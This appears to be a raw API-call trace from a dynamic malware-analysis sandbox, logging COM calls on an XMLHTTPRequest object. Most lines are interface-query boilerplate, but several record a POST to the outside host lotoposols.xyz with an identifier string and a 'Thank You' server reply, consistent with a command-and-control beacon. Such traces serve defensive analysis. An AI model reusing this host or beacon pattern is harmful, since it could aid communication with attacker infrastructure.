	[0223.627] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0223.627] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0223.627] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0223.627] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0223.627] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0223.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0223.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0223.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0223.628] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0223.628] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0223.628] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0223.628] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0223.628] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0223.628] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0223.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0223.628] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0223.628] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0223.628] XMLHTTPRequest:IUnknown:Release (This=0x47a5b88) returned 0x0
	[0223.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0223.628] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0223.628] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0223.628] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0223.628] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0223.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0223.629] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0223.631] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0223.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0223.631] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0223.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0223.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0223.631] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0223.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0223.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0223.632] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0223.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0223.632] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0223.632] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0223.632] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0223.632] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0223.632] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0223.633] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0223.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0223.633] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0223.633] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0223.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0223.633] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0223.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0223.633] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a41948 | out: ppvObject=0x5a41948*=0x0) returned 0x80004002
	[0223.633] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0223.634] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0223.634] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x5a625f8 | out: ppvObject=0x5a625f8*=0x0) returned 0x80004002
	[0223.634] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0233.884] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0233.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0233.884] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0233.884] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0233.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0233.885] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 362835085", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0233.885] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
